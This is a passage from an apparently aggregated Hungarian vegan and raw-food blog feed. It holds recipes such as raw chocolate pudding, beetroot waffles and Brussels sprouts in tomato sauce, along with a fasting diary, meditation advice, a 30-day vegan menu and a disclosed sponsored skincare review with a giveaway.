és néhány karika sárgarépa... hófehér mandulapép sörélesztő pehely, só és citromlé Zöldségek összekeverve csírával Jó későn ebédeltem, így a vacsora ismét egy jó nagy pohár céklalé... Egész nap 1,5 liter víz
Ezt ettem ma 2017. március 14 kedd
2017. március 18. Gitta nyersétel blogja
Mindenki másképp böjtöl. Aki eszik húst, az ilyenkor elhagyja a húst, aki tejet, tejterméket eszik, az böjt alatt ezeket hagyhatja el. Van, aki úgy böjtöl, hogy alkoholt nem iszik, vagy édességet nem eszik. Most a saját böjtömet mutatom be... ez a második nap. Reggel 3 dl citromos víz, utána mentás zöld turmix: 1 alma, 1 grapefruit, 1 marék spenót, pár szál menta, kevés víz elturmixolva. Tálaláskor tettem bele banánt, goji bogyót és még menta leveleket. Frissítő, laktató, finom :) mentás zöld turmix Tízórai 2 banán Ebéd: brokkoli krémleves lenkenyérrel 3 rózsa brokkoli, 1 kisebb sárgarépa, 1/2 avokádó, víz, só, bazsalikom levelek. alapanyagok a leveshez brokkoli leves A lenkenyér receptjét ITT TALÁLOD Ezt barna lenmagból készítettem még a hétvégén, és tettem bele reszelt sárgarépát is :) saláta csírákkal, balzsamecettel Vacsora: egy kiadós salátát szerettem volna enni modenai balzsamecettel, retekcsírával, de amikor elkészítettem, eszembe jutott, hogy van friss jégsalátám. A képeken látjátok, hogy mi lett belőle! Saláta levelek, 2 paradicsom, 1/2 avokádó (a másik fele délben volt a levesben), balzsamecet, csírák, és minden finom és jó, amit otthon találsz a konyhádban és úgy érzed, hogy szívesen ennéd. Ráteszed a saláta levélre, feltekered, majd felvágod. Ami kimaradt a tekercsből, az mehet mellé a tányérra :) Jól meg kell rágni :) a salátát rápakoltam a saláta levelekre feltekertem így néz ki felvágva
Nyers vegán csokipuding
2017. március 16. Vegán lettem
A nyers vegán csokipuding kézenfekvőbb dolog volt vegánná válásom után, mint másoknak a levegővétel, és mivel masszívabban vagyok édesszájú, mint egy vagonnyi óvodás, ezért örömmel láttam, hogy van alternatívája a napi másfél tábla Milkának.
De még milyen. Attyaég, de még milyen…
A krémselymes megváltás nyers vegán csokipuding formájában érkezett egy kedves barátom Messenger üzenetében, válaszul ,,Ernő, A turmixgép beszerzésének hírére. Miután tesómtól február közepén megkaptam a karácsonyi ajándékom (Mi így érezzük jól magunkat. Pont.), szisztematikusan elkezdtem ledarálni mindent - a szomszéd néni macskáján kívül -, amit otthon találtam, és szerettem volna a szervezetembe juttatni.
Ekképp tehát szerezzük be a következőket a nyers vegán csokipuding elkészítéséhez:
1 db avokádó
3 db datolya
1 db közepes méretű banán fele – harmada (nem kell sok)
1,5 dl rizs / mandula / kókusz / tönköly ital, bármelyik jó
2 felespohárnyi nyers, cukrozatlan, 20%-os kakaó
3 csipet só
negyed felespohárnyi fahéj
és ha te is tök perverz vagy, akkor egy kevés szerecsendió
kókuszreszelék a díszítéshez (meg mert baromi finom)
…majd készítsük is el a nyers vegán csokipudingot:
A felespohár a legegyszerűbb mérce és tuti van otthon. Nyilván azokból az időkből, mielőtt vegánná avatásunk előtt a bűnösök életét éltük, és elfelejtettünk volna mindent a növényevésen és a misszionárius pózon kívül.
Így előre megfontolt szándékkal, különös kegyetlenséggel aprítsuk darabokra a szilárd összetevőket. Miután megbizonyosodtunk, hogy az árván maradt datolyák nem zokognak tovább szüleik elvesztésének a látványától, a felkockázott növényi eredetű nyersanyagainkat helyezzük a turmixgép acélpengéi közé, szórjuk rá a porokat (ne kezdd el reflexből összetekerni a húszezrest), majd műalkotásunk megkoronázásaként öntsük nyakon a növényi itallal.
Kapcsoljuk turmixunkat közepes – maximum fokozat környékére jó egy percig.
Ebben a fázisban mindig érdemes megkóstolni. Amennyiben nem találod elég édesnek (mondhatni tök keserű az egész), akkor menj vissza az asztalra, és tedd bele a lemészárolt datolyákat, amiket a fotók készítése miatt kihagytál, majd turmixold megint egy percig. Most már elég édes lesz. Egy kicsit úgy éreztem magam, mint az egyszeri ősember, akinek a szinkronicitások (korábbi nevén: véletlen, de olvassatok Jungot) segítettek megismerni a világot: a dupla turmixolás miatt sokkal selymesebb lett a készítmény, mint a korábbi esetekben. Továbbá tehetsz bele még fahájat, vagy bármi egyebet, amitől az ízlésednek jobban megfelel a végtermék. Építő jellegű kommented kérlek, ne tartsd magadban, hadd áramoljon az információ.
Az így kapott puding a fent leírt mennyiségekből a fotón látható duplája lesz. Ez azért masszív adag szénhidrátból, a kakaó ráadásul afrodiziákum, úgyhogy óvatosan (vagy hajrá, helyzettől függ…) a nyalánksággal. Direkt nem írom, hogy ez hány adag: amikor valami indokolatlan és tök felesleges, de mindkettőnk szerencséjére viszonzatlan valakibezúgás miatt egy hétig ágyban fekve kapucniban animét nézek és trip hopot hallgatok, akkor nagyjából fél adagnak is kevés, ha viszont kiegyensúlyozottan étkezem (nagyrészt nyersen), eljárok futni, tartom a heti két jógát, reggel-este meditálok legalább harminc percet, és csak úgy áramlik a csí, hogy kábé teleportálva húzom ki a szomszéd néni kukáját, akkor simán háromszorra-négyszerre elég egy kis tálkával.
Ja, és még valami: ha szeretettel, odafigyeléssel, törődéssel készítitek, mintha egy kicsit még jobban összeérnének az ízek. Váljék a te, és annak a kedves egészségére, akivel megosztod.
Bokor Krisztián
kakaós gofri
2017. március 13. Beautilicious
Örülnél, ha valamivel megtudnád győzni a gyerekedet, hogy egyen több zöldséget? Ezzel a recepttel garantáltal örömmel csúszik majd le a torkán egy kis cékla. A gofrit mindenki szereti, ezt a gofrit meg pláne szeretni fogjátok. hozzávalók - 2cékla - 2tojás - 100gramm zabliszt - 30gramm kakaó - 40gramm édesítő - egy kis fahéj - kókuszolaj a sütéshez Így készítsd - Tisztítsd meg a céklát, majd aprítógépbe pürésítsd - Add ozzá a nedves, majd a száraz hozzávalókat - keverd össze alaposan - Kend ki a gofrisütőt kókuszolajjal, majd adagold bele a tésztát
Csendesítsd el a gondolataidat
2017. március 10. Élj harmóniában
Néha úgy érzed megrohannak a gondolatok és nem hagynak nyugodni? azt sem tudod hol áll a fejed? és tapasztalatod, hogy teljesen kimerülsz a nap végére? Az elme számára a béke, a harmónia, az elcsendesedés az ideális állapot. Amikor folyamatos a zűrzavar az elmédben, túl sok mindennel foglalkozol, akkor az teljesen kimeríti a szervezetedet. A mai kor embere azt gondolja milyen jó, hogy ezerrel pörög és egyszerre ezer dologgal foglalkozik. Olyan ez, mint amikor van egy laptopod... ha egyszerre egy programot futtatsz, akkor egy bizonyos tempóban kezd el merülni az akkumulátor, de ha nagyon sok programot próbálsz egyszerre futtatni, akkor ha megfigyeled az aksit, nagyon gyorsan kezd merülni és minél több program fut párhuzamosan, a gép annál lassabban kezd működni és adott esetben kiszámíthatatlan dolgokat is produkálhat - gondolom ezt már Te is tapasztaltad:). Ahogy a számítógépet is célszerű takarékosan használni - mindig csak a szükséges programokkal dolgozni - és időnként lekapcsolni, töltőre tenni, úgy a Te szervezetednek is nagyon lényeges , hogy ne pazarold az energiáidat és rendszeresen hagyj időt a szervezetednek az újratöltődésre. Fontos, hogy az életedben a pihenés és az aktív tevékenységek megfelelő arányban legyenek - az ősi jógaírások erről említést tesznek külön is. Akkor fogsz tudni hosszútávon hatékonyan tevékenységeket végezni, ha a szervezetednek, az idegrendszerednek mindig hagysz elegendő időt a feltöltődésre, pihenésre. Az idegrendszered újratöltésére a legideálisabb az alvás, a meditáció és a relaxáció. Feküdj le időben aludni (erről részletesebben itt olvashatsz ) és az egyéni alkatodnak megfelelően aludj eleget. Meditálj rendszeresen. Hagyj a szervezetednek, idegrendszerednek napközben mindig időt arra, hogy feltöltődjön, végezz relaxációt akár naponta több alkalommal. (a relaxációt itt találod) Tapasztald meg a belső csendet és érezd, hogyan segíti ez elő az energiaszinted növelését:) szeretettel: Kati
Ízletes laska gránátalmával és főtt krumplival – vegán recept
Ez a nagyon egyszerűen és gyorsan elkészíthető étel igazán különleges alapanyag-párosításokat tartalmaz, ez adja meg azt a bizonyos extrát, amitől számomra izgalmas lesz egy étel. A laska gomba íze elég enyhe, nincs meg az a jellegzetes gombaíze. Jól ízesíthető, textúráját pedig nagyon szeretem, főleg, ha nincs túlsütve. Jól magába issza a fűszereket, ez esetben leginkább a szójaszószt. A sóshoz a paszternák, a hagyma és a tárkony adja az édeset (és persze az édes-savanyú uborka) ehhez jön a gránátalma friss, savanyú íze, a rukkola borsossága. A főtt burgonya szépen asszisztál mindehhez. Hozzávalók: 1 doboz (300 g) laskagomba 1 doboz (150 g) aranylaskagomba 2 nagyobb paszternák 1 kis fej vöröshagyma 1 marék sósmogyoró 2 evőkanál szójaszósz 1 csipet bors 1 csipet cayenne (kihagyható) 1 teáskanál tárkony Körethez: fél gránátalma 4 közepes méretű burgonya rukkola savanyú uborka (én egy “müncheni” jellegű, édes savanyú uborkát használtam, normál csemegeubival is működne) A hagymát karikákra, a paszternákot negyedkarikákra (cikkekre) vágom, persze hámozás után, a laskagombákat pedig elnagyolva darabolom, hogy kiélvezhessem a szép kis formáit tálalás után is. A hagymát egy kevés vízen, alacsony lángon, lefedve addig párolom a paszternákkal és a sósmogyoróval együtt, amíg a hagyma üvegessé nem válik. Ekkor nagy lángra veszem, és rádobom a gombát, és összeforgatom. Megfűszerezem borssal, cayennel (ha szereted a csípőset), tárkonnyal, és fedő nélkül, időnként megkeverve párolom-pirítom kb. 10 percig. Ekkor adom hozzá a szójaszószt, amitől bronzos színt ölt az egész. Adok még neki 10 percet, időnként megkeverve, hogy minen darab megpirulhasson. Közben a krumplikat megmosom (ha van kedved, meg is hámozhatod), felnégyelem, és sós vízben puhára főzöm. A tányérra halmozom a gombát a paszternákkal, mellé a főtt krumplit, rukkolát, csemegeuborkát. A gránátalmát meghámozom (tehát kiszedem belőle a gyümölcshúst a magocskákkal), és rászórom a gombára. +1 tipp: Így hámozd a gránátalmát: The post Ízletes laska gránátalmával és főtt krumplival – vegán recept appeared first on VegaNinja.
Teljes kiőrlésű almás-diós-csokis keksz
Nemrég vettem egy gabonaőrlőt, azóta frissen őrlöm a lisztet. A recept természetesen kész lisztből és bármilyen búzából megsüthető. Tartalmas édesség, nem az az ebéd utáni fajta. Nagyszerű lehet viszont a gyerekek uzsonnás dobozába vagy kiránduláshoz. Hozzávalók: 20 dkg frissen őrölt alakor liszt 5...
Fánk
2017. március 2. Beautilicious
Bár a farsangi időszakról lecsúsztunk, de ne gondoljátok, hogy fánk nélkül maradtok. A fánkokból sosem elég, főleg nem a Beautilicious féle fánkból. Annyira finom! Na és most fogjátok eldobni az agyatokat! Tudjátok, hogy mi a főszereplő a fánkban; a sárgarépa! Ez komoly! Lehet valami űber finom és ennyire egészséges is egyszerre? A válasz; igeeeen! Pótoljátol minnél hamarabb a farsanggal elszalaszottt fánkokat, ezzel a szuper fánkkal! hozzávalók - 4db répa - 150g zabliszt - 2ek édesítő - 1 tojás - fél zacskó sütőpor így készítsd - a megtisztított répát főzd puhára, majd nyomd össze krumpli nyomóval - Add hozzá a tojást - Keverd össze a száraz hozzávalókat, majd öntsd hozzá - formázz sütőpapírral bélelt tepsibe kis korongokat majd egy fakanál segítségével lyukaszd ki őket középen - Süsd 180fokon 20 percet
Vegán szépségápolás – Perla Organic Skincare + Nyereményjáték
2017. március 2. Zizi kalandjai
Távol állok a beauty blogolástól, nem vagyok a téma szakértője, de többen kérdeztétek már, hogy milyen natúrkozmetikai termékeket használok, ezért indítok egy sorozatot itt a blogon (vegán szépségápolás), amelyben vegán kozmetikai, szépségápolási termékeket mutatok be, amelyeket kipróbáltam, használok és nagyon jónak tartok.
Arra, hogy mit kenek az arcomra (nyaktól felfelé) már lassan tíz éve odafigyelek, de nyilván az idősödés újabb vékonyka ráncokkal jár és rájöttem, hogy ha csak egy kicsivel több időt fordítok magamra, már sokat tettem magamért, azért, hogy lestrappált anyaként kicsit jobban érezzem magam és igen, lassítsam az öregedés folyamatát is, csak egy icike-picikét. Általában fiatalabbnak néznek a koromnál, ez jól esik az egómnak – lehet, hogy hála annak a krémnek, amit már jó néhány éve használok? Nem tudom… talán igen, de azt nagyon fontosnak tartom, hogy időben elkezdjük a korunknak megfelelő bőrápolást.
Amióta anya vagyok azóta tényleg nagyon kevés időt szánok magamra. Amíg régen kétszer mostam hajat egy héten, most csak egyszer (mondjuk egyik várandósságom alatt sem zsírosodott a hajam, ekkor szoktam rá a heti egyszeri hajmosásra). Hajpakolás évente egyszer kerül a hajamra, arcpakolást nagyon ritkán lát az arcom, noha mindegyikből többet szeretnék. Meg néha jól jönne egy kis wellnesezés, amikor befekszem a kádba, bedobok egy fürdőgolyót, lazítok és kikapcsolok végre a hektikus hétköznapokból.
A Perla organikus arcápoló olajat nemrég ismertem meg. Kizárólag hidegen sajtolt, finomítatlan, bio minősítésű olajokat és megtisztelő Demeter minősítésű illóolajokat tartalmaz – jojoba, ligetszépe, szőlőmag, ricinus, tamanu, római kamilla, pálmarózsa, vanília, édesnarancs, vetiver, teafa, linaloefa. Olyannyira a napom részévé vált, hogy napközben többször eszembe jut az újonnan beiktatott kis rutinom és elkezdem várni az estét, hogy csak öt percre is, de egy wellness kényeztetésen érezzem magam. A Perlaval lehet sminket is eltávolítani, én viszont ápolásra használom, mert a munka, a háztartás és a gyerekek mellett alig jut időm magamra, de felismertem, hogy vágyom a puha, hidratált bőrre. A Perlaval beolajozom az arcom, jól átmasszírozom, majd egy meleg vízzel átitatott kis törölközőt az arcomra teszek és várom, hogy egy-két perc alatt a törölköző kihűljön, jól átdörzsölöm vele az arcomat és már készen is vagyok. A nap végén ezt a “luxust” megengedni magamnak, a legjobb dolog. Másnap tényleg tisztább a bőröm, kipihentebbnek tűnök és olyan jól érzem magam tőle.
A Perla csodaszép dobozban érkezik…
A Perla megálmodójával és létrehozójával, Geosics Reginával beszélgettem az alkotásról, a termékről…
Hogyan jött az ötlet és mikor, hogy létrehozz egy ilyen terméket? Mi volt a cél, milyen terméket szerettél volna és miért?
Mindig is problémás bőrrel rendelkeztem, ami körülbelül fél évvel ezelőtt tetófokára hágott… nem csak esztétikailag volt zavaró, de már fájt is a gyulladástól. Szeretem holisztikusan megközelíteni a dolgokat, de akkor úgy éreztem, hogy a táplálkozásommal, életmódommal kapcsolatosan minden tőlem telhetőt elkövetek és “kívül” kell a megoldást keresnem… Emellett kisfiam születése óta folyamatosan keresem azokat a megoldásokat amik leegyszerűsítik az életemet. Ekkor jött szembe egy módszer, az OCM (oil cleaning method) ami itthon még nem túl elterjedt, de külföldön már egyre népszerűbb. Azonnal éreztem, hogy ezt nekem is ki kell próbálnom, de itthon nem találtam hozzá megfelelő minőségű és összetételű olajkeveréket, külföldről pedig túlságosan költséges lett volna rendelni. Így óriási kutatásba kezdtem, annyira belelkesedtem, hogy éjjel-nappal csak ezzel foglalkoztam – nyilván amennyire lehet egy totyogó mellett. Megalkottam a számomra tökéletes kompozíciót és nagyon rövid időn belül látványos eredményt értem el. Környezetemben is felfigyeltek rá és kérték, hogy nekik is keverjek ki Perlát (aminek akkor még nem volt neve). Ekkor bevillant, hogy ha ennyire hatásos és ennyire nem ismerik még Magyarországon, miért ne lehetne mások számára is elérhető. Szeretném terjeszteni magát a módszert és a Perlát is, hogy minél több nőhöz eljusson. Annyira fontos, hogy mi az amit magunkra kenünk és – habár egyre több tudatos nővel találkozom – az emberek nagy részének fogalma sincs arról, mit ken magára.
Milyen szakemberekkel (vagy kikkel) dolgoztál együtt a termék létrehozása során?
A receptet végül egy fantasztikus aromaterapeuta segítségével tökéletesítettük, akitől sokat tanultam és még inkább felnyitotta a szemem, hogy illóolajból csakis a legeslegjobbat érdemes használni. Óriási erő egy kis cseppben, nem is gondolnánk milyen hatással van ránk – nem csupán érzékeinkre, de hangulatunkra, lelkünkre, testünkre. Azóta az illóolajok szerelmese vagyok. A folyamatban részt vett még egy vegyész és a manufaktúra tulajdonosa, ahol minden egyes Perla készül.
Milyen magyar vagy nemzetközi minősítésekkel rendelkezik a termék (Vegan, Cruelty Free, Cosmos Naturel, Biokontroll Hungária Kft, stb.)?
A Perla vegán termék és természetesen állatkísérletektől mentes valamint az összes összetevő bio gazdálkodásból származik, sőt az illóolajok a megtisztelő Demeter minőséggel rendelkeznek. A kész terméket még nem szertifikáltattuk, de tervben van. Hosszú és költséges a folyamat, amit kezdő családi vállakozásként egyelőre még nem tudunk vállalni. Tudom, hogy a hivatalos minősítés fontos, de ami még fontosabb, hogy minden este olyan tiszta lelkiismerettel fekszem le, mint amilyen tiszta a Perla is!
Tervezel el termékbővítést? Ha igen, mi lesz a következő terméked?
Először azt gondoltam, hogy egy tökéletes termék legyen, ami használható tisztításra, sminkeltávolításra, arc- és testápolásra… azóta persze beindult a fantáziám. Nem tervezek széles termékpalettát, de egy-két egyedi ötletem, álmom van, amit még szeretnék megvalósítani. Azt még nem tudom, melyik lesz a következő!
Regina blogja, a Feminie
A Perla elérhető az alábbi linkeken:
– weboldal
– Facebook
– Instagram
A termékeket a {Perla Skincare} biztosította a teszteléshez. A véleményem csakis a sajátom.
*****
NYEREMÉNYJÁTÉK!!!
Nyeremény : Egy üveg (50 ml) Perla többfunkciós organikus olaj. Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen natúrkozmetikai, szépségápolási terméket (márkát) használtok, amely nagyon bevált számotokra.
Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki (bejelentkezés email címmel a formulába): kommentelés (ide a bejegyzés alá) és plusz pontokért lájkoljátok a Perla Facebook, illetve Instagram oldalát. 2017. március 6-ig lehet játszani. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2017. március 7-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Perla Skincare postázza magyarországi címre.
a Rafflecopter giveaway
Öt kontinens levese
Az úgy kezdődött, hogy a múlt hétvégén a februári Vegan Sunday Marketen workshopot tartottam. (és ezt a csokikrémet kóstoltattam a résztvevőkkel!). A workshop előtt nem sok időm volt körbenézni, na, de utána! Lenyűgözött a fantasztikus felhozatal, a MY GARDEN mesés zöldségpultja előtt szabályosan gyökeret vert a lábam. Ismered azt az érzést, amikor egy ennivaló olyan gyönyörű és gusztusos, hogy összemosódnak az érzékeid? Amikor elég ránézni egy almára, és érzed a szádban az édes-savanykás levét? Vagy amikor a vöröshagyma selymes tapintásától eszedbe jut a hang, ahogy olívaolajon serceg apró darabjaira vágva? [...] Bővebben!
A 30 Napos Vegán Kihívás - 1-7. nap menü
1. NAP - szerda Reggeli: Diós-erdei gyümölcsös zabkása Ebéd: rozmaringos főtt csicseri (főtt csicserire kis olívaolaj, citormlé, só, bors, és friss rozmaring, vagy zöldfűszerkeverék), valamilyen gabonával, pl. kuszkusszal és vegyes salátával Vacsora: brokkolis - vörös káposztás spagetti Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 2. NAP -csütörtök Reggeli: aszalt sárgabarackos quinoa-amaránt müzli Ebéd: spenótos rizottó Vacsora: édesburgonyás sárgarépakrémleves diós petrezselyempesztóval 1-2 szelet pirított barna kenyérrel) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 3. NAP - péntek Reggeli:1-2 szelet pirított teljes kiőrlésű kenyér valamilyen olajos mag krémmel (pl. mandula, kesudió, szezám), és esetleg cukormentes lekvárral (pl. bio cukormentes szilvalekvár, vagy bio agave sziruppal édesített gyümölcslekvár); friss gyümölcs (ezt áttolhatod uzsonnára is) Ebéd: leves előző napról + spenótos rizottó előző napról Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/ agave sziruppal édesítsd a nyírfacukor helyett!) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 4. NAP Reggeli: kiviszószos almatorony Ebéd: babkrémes-petrezselyempesztós tekercs Uzsonna-desszert: meggyes banánfagyi Vacsora: barna rizsgolyók bazsalikomos kesuszósszal Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 5. NAP Reggeli: diós- banános hajdinamuffin gabonakávés-natúr szójatejes cappuccinoval Ebéd: csicserikrémes padlizsán-lasagne Uzsonna-desszert: nyers avokádós csokipuding Vacsora: tökmagpástétom friss zöldség szeletekkel, csíkokkal/ teljes kiőrlésű pirítóssal Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 6. NAP Reggeli: - Málnás-amarántos szójajoghurt pirított kókusszal (bármilyen szezongyümölccsel készítheted!) Ebéd: savanyú káposztáskölesfasírt Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/ agave sziruppal édesítsd a nyírfacukor helyett!), akár friss salátával kiegészítve - Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 7. NAP Reggeli: napraforgós-mandarinos reggeli kása Ebéd: paradicsomos szendvics: 2 szelet pirított barna kenyér közé tegyél felszeletelt paradicsomkarikákat, egész bazsalikom leveleket, zöld leveles salátát, csírákat és megkenheted akár tojásmentes kölesmajonézzel is. http://www.vegagyerek.hu/2011/01/tofusalatas-szendvicskrem-es.html Ha gazdagabban szeretnéd megpakolni, akkor tehetsz bele akár az előző napi kölesfasírtból is. Vacsora: tepsiben sült zöldségek: különféle zöldségek, amiket találsz a hűtőben, felaprítva (szezonálisak mehetnek bele nyugodtan, sütőtök, cékla, káposztafélék, répa, stb., figyelj rá, hogy nagy kockákra vágd, ne süljön szét!:-) meglocsolva kis olívaolajjal, hozzá só-bors, és süsd meg a sütőben! Salátát nyugodtan ehetsz hozzá, vagy ha nagyon éhes vagy, valamilyen gabonát is főzhetsz hozzá (rizs, quinoa stb.)! Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint
Túl a sültkrumplin
2017. február 22. Beautilicious
Szenvedélyed a sültkrumpli, de célod az egészséges életmód vagy épp a súlyvesztés? Számoljunk le az egészségtelen krumlival? Ha nem tudsz neki ellen állni, az csak azért lehet, mert még nem kóstoltad az én kedvenc köreteimet ; a cékla hasábot, az édesburgonya hasábot és a zellerhasábot. Elkészítési módja megegyezik a hagyományos hasábéval, de a kalórián és zsíron még így is tudsz csökkenteni, ha sütőben készíted el. Íze akármelyik opciónak felülmúlja a sültkrumpli zsírban tocsogó ízét.
"A Nap első sugarai" - háromszínű zöldségleves
2017. február 21. Vegán receptek Tőlünk Nektek
Anna újabb ínycsiklandó levese:
Hozzávalók:
- 3 nagyobb sárgarépa
- 1 nagy pasztinák
- 1 kisebb karórépa vagy karalábé
- hagyma
- só
- Eden würzl leveskocka
- sáfrányos szeklice
- petrezselyem 2-3 evőkanál kókuszolajon apróra kockázott hagymát megdínsztelek, majd az azonos méretűre kockázott zöldségeket is hozzáadom, sóval együtt párolom. Hagyma nélkül is ízletes. Két "Eden würzl" leveskockát és sáfrányos szeklicét beleszórok a levesbe. Puhára főzöm, a legvégén petrezselymet teszek hozzá. Az édes ízek, meleg színek harmóniája felfrissül a zöld petrezselyemmel. Tálalhatom grízgaluskával is. Jó étvágyat!
Céklás-kakaós zabkása
2017. február 18. Beautilicious
A zabkása egy tökéletes választás a nap indításához. Nem kell hozzá se se idő, se nagy főző tudomány. A legjobb benne, hogy annyi féle képp elkészítheted, hogy sose lehet ráunni. Az én egyik kedvenc ízesítésem a céklás-kakaós, amit megsúgok nektek, hogyan készítek. hozzávalók - 40g zabpehely - 150ml kókusztej - 1ek édesítő - fél főtt cékla - 1ek kakaópor Így készítem - A céklát megfőzöm, majd aprítógépben pépesítem - a zabpelyhet felteszem főni a tejjel, majd hozzáadom a céklát - Még melegen belekeverem az édesített kakaóport
Az én történetem
2017. február 18. Beautilicious
Sziasztok! Sokan vannak, akik némi túlsúlytól szenvednek, vagy épp súlyhiánytól, és próbálnak mindent megtenni, hogy változtassanak rajta, de sehogy se megy, így ráfogják, hogy 'ilyen a genetikám' , és feladják. Elárulom nektek, ez nem így van. Minden fejben dől el! Pár éve én is küzdöttem a fölös kilókkal. Pizza, kenyér, péksütik, gumicukor... jöhetett bármi, ami zsír és szénhidrát. Ez a súlyomon meg is látszott, hisz nem túl magas; kb. 160 centimhez 75 kiló társult. Ez kezdetben nem zavart, majd később jött egy új osztálytárs, aki előszeretettel becézgetett pufinak, dundinak vagy csülöknek. Eljátszottam, hogy poénra veszem az egészet, de ezek a szavak egy életre beleégnek az ember fejébe. Soha ne illess másokat negatív jelzővel, tönretehetsz vele egy lelket akár egy életre! Először a koplalásban bíztam, majd szerencsémre a családom nem hagyta. Elképesztően szerencsés vagyok, hogy ilyen szüleim vannak, akik mindig odafigyelnek rám és támogatnak mindenben. Édesanyám már nagyon rég óta az egészséges életmódot preferálja, így rengeteg segítséget kaptam, és látványos eredményt értem el. Kezdetben sem követtem semmilyen diétát. Nem látom értelmét, hisz a legtöbb diéta egyoldalú táplálkozást követel, melyek szervezeted számára nincsenek kedvező hatással, és csak néhány hétig tarthatóak, majd a leadott kilók dupláját szeded fel a diéta végén, nem beszélve arról, hogy értékes tápanyagokat vonsz meg magadtól. Én először a péksüteményeket és a cukros italokat light termékekre cseréltem, majd jöttek a házi készítésű ételek, amikért egyszerűen odavagyok. Mára a szenvedélyemmé vált a sütés-főzés. Ha van egy kis szabadidőm, rohanok a konyhába, megnézem, mi van itthon, és beindul a fantáziám. A legjobb dolog, amikor anyuval együtt sütünk és kétszer annyi hozzávalót használunk, mert valami érthetetlen módnál fogva a sütés közben eltűnik a fele :). Ez már nem holmi fogyás és diéta, ez életmód! Sokkal boldogabbnak és kiegyensúlyozottabbnak érzem magam, és nem tudom elképzelni, hogy valaha is felhagynék ezzel az életmóddal. Imádok kísérletezni, új recepteket alkotni, és ezeket megosztani veletek. Emellett a sport is szerepet játszik a mindennapjaimban. Imádok sportolni, új mozgásformákat kipróbálni, és feszegetni saját határaimat. Nem azért mozgok, mert kell, hanem mert szeretem. A lényeg, hogy megtaláld azt a mozgásformát, ami boldoggá tesz. Egy rossz nap után nehezen veszem rá magam az edzésre, de az edzés után a fellegekben érzem magam. Próbálj időt szakítani a rendszeres testmozgásra, és hidd el a tested és lelked is meghálálja!
Kelbimbó olaszos paradicsommártásban (gluténmentes, laktózmentes, tojásmentes, vegán)
2017. február 16. Zöld Avocado
Ez is egyike a hihetetlenül egyszerűen elkészíthető különleges és finom ételeknek, mely a természet ízeit kombinálja egy gyorsan elkészíthető egytálételként. Egy fogás, melyet még a konyhában ritkán megforduló jelentkezők is el tudnak készíteni és szinte lehetetlen elrontani. Kelbimbó olaszos paradicsommártásban (gluténmentes, vegán)Egy ebéd, egy vacsora, melyet különböző köretekkel tálalva, különböző formában láthatunk viszont. Könnyed salátára vágyunk? Fogyasszuk friss saláta ágyon! Paradicsomos tésztaételt ennék? Főzzünk ki mellé a diétánknak megfelelő tésztát! Valami rakottszerű, rizses egytálételre dobbant meg a szívünk? Keverjük össze barna rizzsel vagy quinoával, a még egészségesebb és táplálóbb végeredményért! El tudom még képzelni kölessel, hajdinával, pita tésztába töltve, ropogós, frissen sült kenyérrel, vagy cukkini hajókba töltve és önmagban, köret nélkül is. A lehetőségek tárháza végtelen... Kelbimbó olaszos paradicsommártásban (gluténmentes, vegán) A kelbimbó és én nem voltunk jó barátságban. Soha senki nem tudta úgy elém tenni, hogy én azt finomnak érezzem és újra elkészítsem. Az évek során azonban megtanultam, hogy MINDENT el lehet készíteni ízletesen, még ha alapvetően nem is szimpatikus az a zöldség, gyümölcs, gabona vagy egyéb alapanyag. Rengeteg jótékony hatása van a kelbimbónak, ezért kihívásnak éreztem elkészíteni a "finom kelbimbót". A tavalyi kelbimbó szezonban már sikerült egy céklás-sütőtökös-narancsos-kelbimbót készítenem, ami annyira jól és szemet gyönyörködtetően sikerült, hogy azóta számtalanszor elkészítettem már és más, "kelbimbót kerülő" vendégeket is elcsábítottam a "kelbimbót fogyasztók" táborába. Az idei szezonban egy újabb sikerélmény született a zöld kis mini káposzták ügyében. Ezúttal olaszos ízvilágú, paradicsomos mártásban került az asztalra, majd az éhes pocakokba, mindenki nagy elégedettségére. Miért fogyasszunk kelbimbót? "A kelbimbó igen gazdag vitaminokban. Tartalmaz A-, B-, K-, E- és C-vitamint, valamint élelmi rostokat, kalciumot, magnéziumot és vasat. Rosttartalmának köszönhetően jó hatással van a belekre, illetve segíti az emésztést. Erősíti a szervezetet, és fokozza annak ellenálló képességét. Káliumtartalma miatt kiváló vízhajtó hatással rendelkezik. A kelbimbó csökkenti a koleszterinszintet, legjobban nyersen fogyasztva fejti ki hatását, de párolva is megőrzi ezt a tulajdonságát. Kiváló omega-3 zsírsav-forrás, melynek köszönhetően a vérnyomás csökkentésében is hasznos lehet. Fitotápanyag-tartalmának köszönhetően rákvédő anyagokat tartalmaz, melynek következtében csökkenti a különböző daganatos megbetegedések kialakulását szervezetünkben. Jó hatással van a pajzsmirigyműködésre is. Terhes nőknek fogyasztása kifejezetten ajánlott, hiszen magas folsav - és kalciumtartalommal rendelkezik." Forrás : Házipatika Kelbimbó olaszos paradicsommártásban (gluténmentes, vegán) HOZZÁVALÓK (Kb. 4 személyre) - 500 g kelbimbó - 70 g (kis konzerv) paradicsompüré - 2 db közepes méretű sárgarépa - 3 gerezd fokhagyma - 1/2 db vöröshagyma - (Himalája) só, fekete őrölt bors, szárított oregánó (vagy friss bazsalikom) - 1 ek balzsamecet - 3 dl tiszt víz - köretnek pl.: kagyló / penne / spirál tészta (diétánknak megfelelő) vagy friss ropogós salátaágy vagy barna rizs stb. Kelbimbó olaszos paradicsommártásban (gluténmentes, vegán)ELKÉSZÍTÉS 1) Megtisztítjuk a kelbimbót és a répákat. Kettévágjuk a "bimbókat" és vastagabb karikára a répát. A hagymát apróra szeljük. 2) Előveszünk egy hőálló (jénai) tálat és beleszórjuk az apróra vágott hagymát, a 